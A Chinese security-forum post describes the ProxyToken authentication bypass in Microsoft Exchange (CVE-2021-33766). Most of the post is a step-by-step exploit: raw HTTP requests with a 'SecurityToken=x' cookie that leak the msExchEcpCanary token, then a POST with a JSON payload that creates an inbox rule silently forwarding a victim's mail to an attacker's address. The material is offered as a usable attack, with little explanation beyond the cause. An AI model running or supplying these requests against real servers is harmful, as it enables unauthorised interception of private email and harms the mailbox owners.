请选择 进入手机版 | 继续访问电脑版
查看: 13018|回复: 0

ExchangeServer email窃听漏洞-PROXYTOKEN (CVE-2021-33766)

[复制链接]
匿名
匿名  发表于 2021-9-2 21:23:10 |阅读模式
漏洞原因:
漏洞出现在“委托身份验证”的功能中,如果前端header中存在非空的SecurityToken的Cookie时,就会直接请求后端服务,不会加载委托认证的模块(DelegatedAuthModule)。

1. 向受目标服务器请求poc泄露msExchEcpCanary
[AppleScript] 纯文本查看 复制代码
POST /ecp/[email protected]/RulesEditor/InboxRules.svc/NewObject
...
Cookie: SecurityToken=x
...

2. 在response 500 错误的header中找到msExchEcpCanary

3. 使用 msExchEcpCanary 值代入,请求设置转发规则
[AppleScript] 纯文本查看 复制代码
POST /ecp/RulesEditor/InboxRules.svc/NewObject?msExchEcpCanary=$token
...
Cookie: SecurityToken=x
...
{"properties":{"ForwardTo":[{"RawIdentity":"[email protected]","DisplayName":"myemail","Address":"[email protected]","AddressOrigin":3,"RecipientFlag":0,"RoutingType":"SMTP","SMTPAddress":"[email protected]"}],"Name":"test","StopProcessingRules":"true"}}

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

上海市通信管理局

江苏省委网信办

台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋|

GMT+8, 2023-6-7 00:43 , Processed in 0.021945 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz!

© 2001-2023 Discuz! Team.